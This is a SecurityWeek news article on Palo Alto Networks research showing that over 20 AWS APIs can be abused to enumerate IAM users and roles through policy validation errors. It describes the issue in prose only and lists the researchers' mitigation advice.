Security Experts:

Connect with us

Hi, what are you looking for?


Identity & Access

Researchers Find Tens of AWS APIs Leaking Sensitive Data

Palo Alto Networks security researchers identified more than 20 Amazon Web Services (AWS) APIs that can be abused to obtain information such as Identity and Access Management (IAM) users and roles.

Palo Alto Networks security researchers identified more than 20 Amazon Web Services (AWS) APIs that can be abused to obtain information such as Identity and Access Management (IAM) users and roles.

The same attack could be leveraged to abuse 22 APIs across 16 different AWS services to obtain the roster of an account, get a glimpse into an organization’s internal structure, and leverage the information to launch targeted attacks against specific individuals.

According to the security researchers who identified the vulnerable APIs, the attack works across all three AWS partitions (aws, aws-us-gov or aws-cn). AWS services susceptible to abuse include Amazon Simple Storage Service (S3), Amazon Key Management Service (KMS), and Amazon Simple Queue Service (SQS).

“The root cause of the issue is that the AWS backend proactively validates all the resource-based policies attached to resources such as Amazon Simple Storage Service (S3) buckets and customer-managed keys,” Palo Alto Networks explains.

A Principal field is typically included in resource-based policies, to specify the users or roles with access to the resource. However, if a nonexistent identity is included in the policy, the API call to create or update the policy fails, and an attacker can abuse this feature to check existing identities in an AWS account.

By repeatedly invoking the vulnerable APIs with different principals, an adversary can enumerate the targeted account’s users and roles. What’s more, the enumeration is not visible from the targeted account, because the API logs and error messages are available only for the “attacker’s account where the resource policies are manipulated,” the researchers note.

Detection and prevention of such an attack are rather difficult, with the adversary not being time restricted when it comes to performing reconnaissance on random or targeted AWS accounts.

IAM security best practices for organizations looking to mitigate the issue, Palo Alto Networks says, include reducing attack surface by removing inactive users and roles, making usernames and role names difficult to guess by adding random strings to them, log and monitor identity authentication activities, use two-factor authentication (2FA), and log in with identity provider and federation.

“Good IAM security hygiene can still effectively mitigate the threats from this type of attack. Although it’s not possible to prevent an attacker from enumerating identities in AWS accounts, the enumeration can be made more difficult and you can monitor for suspicious activities taken after the reconnaissance,” the researchers note.

Related: AWS Network Firewall Now Generally Available

Related: AWS Fraud Detection Service Becomes Generally Available

Related: AWS Security Service ‘Amazon Detective’ Now Generally Available

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

Identity & Access

Zero trust is not a replacement for identity and access management (IAM), but is the extension of IAM principles from people to everyone and...


Apple has released updates for macOS, iOS and Safari and they all include a WebKit patch for a zero-day vulnerability tracked as CVE-2023-23529.

Application Security

Drupal released updates that resolve four vulnerabilities in Drupal core and three plugins.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.


Patch Tuesday: Microsoft warns vulnerability (CVE-2023-23397) could lead to exploitation before an email is viewed in the Preview Pane.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.